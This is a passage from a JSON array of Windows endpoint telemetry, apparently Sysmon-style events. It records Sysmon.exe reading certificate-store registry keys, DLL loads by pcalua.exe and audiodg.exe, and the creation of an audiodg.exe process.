131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ndfapi.dll", - "image_path": "C:\\Windows\\System32\\ndfapi.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573974950016, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wdi.dll", - "image_path": "C:\\Windows\\System32\\wdi.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, 
- "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_value": "Disallowed", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { 
- "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "xmllite.dll", - "image_path": "C:\\Windows\\System32\\xmllite.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software 
Publishing", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "command_line": "C:\\WINDOWS\\system32\\AUDIODG.EXE 0x318", - "event_type": "process", - "logon_id": 997, - "parent_process_name": "svchost.exe", - "parent_process_path": "C:\\Windows\\System32\\svchost.exe", - "pid": 6784, - "ppid": 2136, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "subtype": "create", - "timestamp": 131883573975300000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}", - "unique_ppid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}", - "user": "NT AUTHORITY\\LOCAL SERVICE", - "user_domain": "NT AUTHORITY", - "user_name": "LOCAL SERVICE" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573975259984, - 
"unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975259984, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - 
"registry_value": "CTLs", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975259984, - "unique_pid": 